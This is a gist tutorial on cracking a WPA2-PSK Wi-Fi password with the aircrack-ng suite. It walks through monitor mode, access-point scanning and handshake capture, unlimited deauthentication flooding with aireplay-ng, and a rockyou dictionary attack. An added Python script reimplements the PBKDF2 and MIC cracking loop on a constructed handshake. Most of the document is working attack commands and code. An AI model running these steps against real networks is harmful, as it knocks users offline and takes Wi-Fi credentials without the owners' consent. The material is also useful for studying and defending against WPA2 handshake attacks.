@theriturajps
Created September 16, 2023 15:25
Use airmon-ng to hack Wi-Fi network
cat /etc/os-release or uname -a >>>>> check which distribution and kernel you are running
ip addr >>>>> list the network interfaces and note the name of the wireless one (wlan0 here)
iwconfig >>>>> to see whether the Wi-Fi adapter is in Mode:Monitor or Mode:Managed
sudo airmon-ng check kill >>>>> to kill conflicting processes (NetworkManager, wpa_supplicant) that would otherwise interfere with monitor mode
sudo airmon-ng start wlan0 >>>>> switch the Wi-Fi adapter from Mode:Managed to Mode:Monitor (the monitor interface is normally named wlan0mon)
sudo airmon-ng >>>>> also use this to confirm the interface is now wlan0mon
sudo airodump-ng wlan0mon >>>>> discover the access points in range; note the BSSID and CH of the router you are testing
-----------------------------------------------------------------------------------------------------------------
BSSID              PWR  Beacons  #Data, #/s  CH  MB  ENC   CIPHER  AUTH  ESSID

5E:34:7B:83:41:64  -23       34      0    0   1  65  WPA2  CCMP    PSK   Ritu Raj Pratap Singh
-----------------------------------------------------------------------------------------------------------------
sudo airodump-ng wlan0mon -d 5E:34:7B:83:41:64 >>>>> to display only that access point (-d is the same as --bssid, a filter on the AP's MAC).
sudo airodump-ng -w rituwifi -c 1 --bssid 5E:34:7B:83:41:64 wlan0mon >>>>> start the capture: (-w rituwifi) is the output file prefix, so the capture lands in rituwifi-01.cap, which you can later open in Wireshark; (-c 1) locks the adapter to the channel the router is on; (--bssid 5E:34:7B:83:41:64) records only that access point; wlan0mon is the monitor interface we are using. Leave this running.
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
in second window
-----------------
sudo aireplay-ng --deauth 0 -a 5E:34:7B:83:41:64 wlan0mon >>>>> to deauthenticate the clients from the network; (0) means the deauthentication frames are sent without limit until you stop it with Ctrl-C (add -c AE:28:EE:1C:9B:A0 to target only that one client). This works because 802.11 deauthentication frames are not authenticated unless the network enforces Protected Management Frames (802.11w).
>> while this runs, reconnect a client to the router (here the phone "AE:28:EE:1C:9B:A0"); after a moment the first window shows "WPA handshake: 5E:34:7B:83:41:64" in the top-right corner of the airodump-ng output, meaning the 4-way handshake has been captured.
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
ls >>>>> you can see the captured rituwifi-01.cap file.
wireshark rituwifi-01.cap >>>>> to open "rituwifi-01.cap"; the Wireshark window shows everything that was captured, so enter "eapol" in the display filter to keep only the EAPOL-Key frames of the 4-way handshake. There may be several; find the one with Source "AE:28:EE:1C:9B:A0" and Destination "5E:34:7B:83:41:64" (sort by Source if needed), expand it and look at the WPA Key Data field ( 301a0100000fac040100000fac040100000fac0280000000000fac06 ), which is the RSN information element the phone sent to the router in message 2 of the handshake. The MIC field in these frames is what aircrack-ng tests candidate passwords against.
sudo airmon-ng stop wlan0mon >>>>> now stop monitor mode; the adapter goes back to Mode:Managed as wlan0.
aircrack-ng rituwifi-01.cap -w /usr/share/wordlists/rockyou.txt >>>>> to crack the password from the cap file using the rockyou dictionary (add -b 5E:34:7B:83:41:64 if the capture holds more than one network). This only succeeds if the passphrase is in the wordlist: aircrack-ng derives the key from each candidate and checks it against the handshake's MIC. [ if rockyou.txt.gz is not unzipped yet, use "sudo gzip -d /usr/share/wordlists/rockyou.txt.gz" ]
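Added example, not part of the original gist: what the two steps above (inspecting the EAPOL frames in Wireshark, then running aircrack-ng with rockyou) do under the hood, written out in Python. It decodes the RSN IE from the gist's WPA Key Data field, classifies a handshake frame by its Key Information flags the way Wireshark labels Message 1..4, and runs the dictionary attack aircrack-ng performs: PBKDF2 over passphrase and SSID to get the PMK, PRF-512 to get the KCK, then HMAC-SHA1 over the EAPOL frame and a compare against the captured MIC. The BSSID, phone MAC, ESSID and RSN IE bytes are the ones in the gist; the nonces, the "true" passphrase and the small wordlist are constructed for the demo and stand in for a real rituwifi-01.cap and rockyou.txt.

```python
# Added example, not part of the original gist: the core of what aircrack-ng does with
# rituwifi-01.cap and rockyou.txt. Only the RSN IE bytes, the MAC addresses and the ESSID
# come from the gist; the handshake, nonces, passphrase and wordlist are constructed here
# so the script runs offline without a capture file.
import hashlib
import hmac
import struct

# RSN information element the phone sent in message 2 (Wireshark "WPA Key Data" in the gist).
RSN_IE_FROM_GIST = bytes.fromhex("301a0100000fac040100000fac040100000fac0280000000000fac06")

# IEEE 802.11 suite selectors for OUI 00-0f-ac (the ones seen on WPA2/WPA3 networks).
SUITES = {1: "WEP-40", 2: "TKIP", 4: "CCMP-128", 5: "WEP-104", 6: "BIP-CMAC-128", 8: "GCMP-128"}
AKMS = {1: "802.1X", 2: "PSK", 5: "802.1X-SHA256", 6: "PSK-SHA256", 8: "SAE"}


def parse_rsn_ie(ie: bytes) -> dict:
    """Decode an RSN IE (element ID 0x30): group cipher, pairwise ciphers, AKMs, PMF capability bits."""
    if len(ie) < 2 or ie[0] != 0x30 or len(ie) < 2 + ie[1]:
        raise ValueError("not a complete RSN IE")
    body = ie[2:2 + ie[1]]
    name = lambda table, p: table.get(body[p + 3], f"unknown({body[p + 3]})")  # skip the 3-byte OUI
    version = struct.unpack_from("<H", body, 0)[0]
    group, pos = name(SUITES, 2), 6
    n_pair = struct.unpack_from("<H", body, pos)[0]
    pairwise = [name(SUITES, pos + 2 + 4 * i) for i in range(n_pair)]
    pos += 2 + 4 * n_pair
    n_akm = struct.unpack_from("<H", body, pos)[0]
    akm = [name(AKMS, pos + 2 + 4 * i) for i in range(n_akm)]
    pos += 2 + 4 * n_akm
    caps = struct.unpack_from("<H", body, pos)[0] if pos + 2 <= len(body) else 0
    return {"version": version, "group": group, "pairwise": pairwise, "akm": akm,
            "mfp_capable": bool(caps & 0x0080), "mfp_required": bool(caps & 0x0040)}


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 with label "Pairwise key expansion"; the first 16 bytes of the PTK are the KCK keying the MIC."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    blocks = (hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4))
    return b"".join(blocks)[:64]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key descriptor version 2 (CCMP): MIC = HMAC-SHA1(KCK, EAPOL frame with the MIC field zeroed)[:16]."""
    zeroed = frame[:81] + bytes(16) + frame[97:]  # MIC occupies EAPOL offsets 81..96
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, rsn_ie: bytes, kck: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 (supplicant -> AP) carrying the RSN IE, with a valid MIC."""
    key_info = 0x010A  # descriptor version 2 | pairwise | MIC set, ACK clear: the message-2 pattern
    body = (b"\x02" + struct.pack(">HHQ", key_info, 16, 1) + snonce  # descriptor type, key length, replay counter
            + bytes(32)  # key IV, RSC, key ID: all zero in message 2
            + bytes(16)  # MIC placeholder, filled in below
            + struct.pack(">H", len(rsn_ie)) + rsn_ie)
    frame = b"\x02\x03" + struct.pack(">H", len(body)) + body  # EAPOL version 2, type 3 = EAPOL-Key
    return frame[:81] + eapol_mic(kck, frame) + frame[97:]


def handshake_message_number(frame: bytes) -> int:
    """Classify a 4-way handshake frame from its Key Information flags (Wireshark's Message 1..4)."""
    key_info = struct.unpack_from(">H", frame, 5)[0]
    install, ack, mic, secure = key_info & 0x40, key_info & 0x80, key_info & 0x100, key_info & 0x200
    if ack and not mic:
        return 1
    if ack and mic and install:
        return 3
    return 2 if not secure else 4


def crack(msg2: bytes, ssid: str, ap_mac: bytes, sta_mac: bytes, anonce: bytes, wordlist):
    """The aircrack-ng loop: PMK -> KCK for each candidate, then compare against the captured MIC."""
    snonce, captured_mic = msg2[17:49], msg2[81:97]
    for candidate in wordlist:
        kck = ptk_from_pmk(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), captured_mic):
            return candidate
    return None


def demo() -> dict:
    """Constructed handshake for the network in the gist; the passphrase and wordlist are made up."""
    ssid = "Ritu Raj Pratap Singh"          # ESSID from the airodump-ng listing
    ap_mac = bytes.fromhex("5E347B834164")  # BSSID from the gist
    sta_mac = bytes.fromhex("AE28EE1C9BA0") # phone MAC from the gist
    anonce = hashlib.sha256(b"constructed anonce").digest()  # constructed, deterministic
    snonce = hashlib.sha256(b"constructed snonce").digest()
    true_passphrase = "ritu-wifi-2023"      # assumption for the demo, not the real key
    kck = ptk_from_pmk(pmk_from_passphrase(true_passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    msg2 = build_msg2(snonce, RSN_IE_FROM_GIST, kck)
    wordlist = ["password", "12345678", "iloveyou", true_passphrase, "qwerty123"]  # stands in for rockyou.txt
    return {"rsn": parse_rsn_ie(RSN_IE_FROM_GIST), "message": handshake_message_number(msg2),
            "cracked": crack(msg2, ssid, ap_mac, sta_mac, anonce, wordlist)}


if __name__ == "__main__":
    print(demo())
```

Two things worth reading off the output. The RSN IE decodes to WPA2 with CCMP and the PSK AKM, matching the ENC/CIPHER/AUTH columns airodump-ng showed, and its capability word 0x0080 says the phone is PMF-capable but the network does not require it, which is why the unprotected deauth frames from aireplay-ng were honoured. The cost of the attack is the 4096-iteration PBKDF2 per candidate: every wordlist entry costs that much before the cheap MIC check, which is why the passphrase must be in the dictionary and why GPU crackers are used for large wordlists.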
NOTE
------
if, back in Kali, you try to connect to Wi-Fi and get "NetworkManager is not running" (airmon-ng check kill stopped it earlier), restart it with -
$ sudo service NetworkManager restart